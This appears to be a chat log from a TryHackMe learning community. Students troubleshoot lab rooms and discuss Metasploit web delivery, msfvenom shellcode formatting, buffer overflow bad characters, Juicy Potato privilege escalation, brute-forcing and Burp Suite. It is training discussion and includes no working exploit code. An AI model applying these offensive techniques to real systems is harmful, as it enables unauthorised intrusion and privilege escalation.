You would have to look it up, but the default setting usually should be fine.
But ye try to change it and see what happens.
Other than that I'm not sure what the issue might be, have you tried restarting the target machine already ?

No problem, thanks for the thoughts anyway. Yea, i've been back to the task a few times now actually. I should move on I guess and just use the web del method (seems to be ok)

Gave +1 Rep to @dense gate

Ye, maybe it's just some sort of connection issue.
One quick thing to try would be sudo ip link set dev tun0 mtu 1200 to see if that changes anything, if it doesn't just put it back to 1500

I just finished using the web delivery module of metasploit. I'd be curious what the difference in payload was. kinda why I avoid metasploit you know? sometimes it feels like you did something, but didnt learn how it happened

on to hackpark ;D

this happen because maybe u have configured another ip address on the ssh config

this can solve this issue

Hello guys, I'm on the Brainstorm room. I'm trying to load the exe in Immunity Debugger but I have a message saying it cannot load a 16-bit application. How should I proceed ?

I'm on Win10 x64, I tried to enable 16-bit app but I don't have the NTVDM feature available...

make sure you have the associated dll in the same dir as the exe but I used a windows 7 VM(the blue machine on thm https://tryhackme.com/room/blue) to get it work, by installing everything on it

I have the dll in the same folder but it's not working. I'm also gonna use a VM from another room. I would have liked to understand how to do it on my machine but anyway ^^

yeh, you can use the already installed immunity debugger from bufferoverflowprep room, somehow I didn't think of it at the time, and it's a system architecture thing afaik

Ok, that's what I'm doing right now. Thanks for the answer.

Gave +1 Rep to @fathom marten

Hi im on the buffer overflow room and

overflow 1 was fine but

when i try overflow 2

the EIP isnt showing up

i redid it a couple of times but i still cant find it

man

buffer overflow is too confusing

Anyone know how to exploit external blue? port 445 is closed

Hey , is this path good for oscp

I mean can I be able to pass oscp after completing this path?

No, you should complete Pen-200 and as much of the coursework, extra miles, and labs as you can

Is this related to a room on the path?

Mr Robot is a great room but what ever bastard made the wordlist 800,000 words long is genius/villain.

I literally figured out the hint 17mins into the brute force, and got it at the exact same second the brute force did

Note - don't miss obvious things like scrollbars in your browser OR use curl more

need help with msfvenom

im working on oscp bof prep

after generating payload in -f c

i always have to format the code to find python string.

if i do, -f py, it generates the string in bytes, not hex string.

is there a way to get it in python hex string format ?

what do you mean, "python hex string format" all of 'em use the \x00\x01 format

i mean, the output of msfvenom is not "\x01", it is b"\x01" + b".." + b".." etc

yeh, thats how python knows it's a byte and not a string, with the b"", tho if you want to edit it, use multi-line selection( in sublime text, it's ctrl+shift+L) and you can add letters over multiple lines in one click

okay.

Hey guys, I got a question for y'all.

I've been struggling to understand the whole potato family exploits as I don't have any Windows administration background.

Ok so, one of them being Juicy Potato, and it says that "-l <port>: COM server listen port".
This part really confuses me. I initially thought that there already WERE existing COM server ports listening for authentication within the system much like how I'd imagined being able to see them by "netstat -ano".

However, it wasn't the case according to my test. I was able to put any port number(btw 1 to 65535) for "-l" flag and able to get to root. Does that mean we are telling the JuicyPotato to use an arbitrary localhost proxy port for the authentication relay? Can anyone please confirm this? or correct me?

Yes its part of the offensive pentesting path.

I keep getting this error on the steel mountain (bottom left) when trying to connect to the http server. I tried both with Python and Python 3 and get the same error. I’m using my Kali Linux terminal

Yea ik so what should I do to fix the error because i tried putting just Python elliotmrrobot.py ip port and the same error happened

i got it figured out

I’ll try that

anyone else have trouble signing into the admin account on the Corp box?

it keeps giving me some access control error about specific times the account is allowed to sign in, or no empty passwords being allowed, when I try in cmd/powershell; and trying in the gui popup it says the password expired

Use the official ms rdp client

is that remmina or xfreerdp?

it's this one

I don't currently use windows, am I able to run that in the box or get some other windows machine running?

you can use this room for rdp
https://tryhackme.com/room/windowsbase

it's just a windows vm for use

oh cool! Thanks

am i the only one where the RDP session is not working for this room https://tryhackme.com/room/corp

ooops..my badness. i was specifying the wrong username

working through the buffer overflow section, and I'm a bit confused why|| mona keeps saying that \x01 is a bad character. I've already removed \x00, but unless I remove \x01, the other bad characters don't show up in the mona compare command. Yet, when i eventually do the payload, sure enough, \x01 is not a bad character. I understand the a bad character might corrupt the byte beside it, but with 0 removed, why is 1 still showing up?||

Hi all I'm preparing for oscp anyone on same page let me know at present I'm workin on tryhackme boxes if interested hit me up will work together!!!

Are you already into OSCP?

im doing the this path, and there is the part with burp suite and the websites im trying to connect to using burp suite is loading really slow, and not even going up. does any know how to fix?

have you left burp proxy in intercept mode???

and if so forwarded the request???

im pretty new so i dont know alot, can you explain?

if that thingy is blue/on it means it catches all traffic from and to your browser until you hit the forward button

or turn it off

it is useful to be able to modify the things before sending or reciving them

would recommend doing the burp suite module if you are having problems using burp

@lofty finch

also a good idea would be to verify on this discord so you can post images

!docs verify

i have it on

but the problem is that all the websites are lagy

and slow

Do you understand what it does?

i think

Please explain what you think it does

its gets all the traffic from the browser to burp so i can read it, understand it

It holds on to all the traffic so that you can modify it before passing it on

Burp can always see anything proxied through it, regardless of if you have intercept on

hoooo

thanks

i didnt get that

but in the path its says to have it on

Bear in mind you may be misinterpreting the instructions

And it has to be on if you want to manually modify a request before the server gets it, which is likely what you have to do

i think i know what to do

but when i go to the intruder its and start the attack its says that "No payload positions defined"

ok

doesnt matter

i got it

it just didnt give me the file i need to put in

Generally it's best to think carefully about what you're doing and why before asking for help

If you don't know what you're doing or why, you should find that out first.

im trying to think

sorry for being annoying but i follow the tutorial and learn on the way

and i really dont know what im doing wrong

Typically, these problems can be solved by very carefully re-reading the text and looking at what you're doing

ok solved it

it was a bit weird but yea

thanks for the help mate